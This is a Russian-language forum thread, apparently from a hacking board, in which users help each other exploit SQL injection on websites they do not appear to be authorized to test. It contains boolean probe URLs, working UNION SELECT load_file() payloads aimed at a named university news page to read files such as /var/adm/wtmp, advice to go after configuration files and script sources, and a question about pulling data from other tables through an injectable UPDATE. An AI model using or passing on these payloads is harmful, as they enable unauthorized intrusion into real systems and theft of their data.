Причем здесь уязвимости?

В поле http://www.site.ru/pop/search.cgi?q='

Software error:

DBD::mysql::db selectrow_array failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1 at /usr/local/apache/htdocs/pop/search.cgi line 111.

Это SQL инекция ? Тогда как раскрутить?

скорее всего да
если там идут числовые значения то можно попробовать так
http://www.site.ru/pop/search.cgi?q=2-1
http://www.site.ru/pop/search.cgi?q=1/**/and/**/1=1
http://www.site.ru/pop/search.cgi?q=1/**/and/**/1=2
ну а так сайт в ЛС если не трудно

Кинь сайт в личку, или пробуй:

есть функция load_file
magic_quotes_on
удалось прочитать несколько файлов, вот только их содержимое несовсем понятно што из этого можна извлечь полезного (в мозиле у меня все отобразилось в непонятных кодах,в гугл хроме нормально)
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,load_file%280x2f7661722f61646d2f 77746d70%29,3,4,5--
/var/adm/wtmp
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,load_file(0x2f6574632f75746d70), 3,4,5--
/var/adm/qacct

админка:
mysql:

обычно читаются файлы настроек, исходники скриптов. соответсвенно от твоих целей и нужно действовать.
ЗЫ Задай себе вопрос- что я хочу?

да мнебы конфиги, или возможно логи прочитать)
но я с етой системой незнаком(

Такой вопрос по mysql-inj...
Я хочу проапдейтить колонку, но про апдейтить так чтобы в нее была записана какая либа сущ. инфа из таблицы (но другой)(т.е. есть иньекция в параметре update)

Как это сделать? И возможно ли?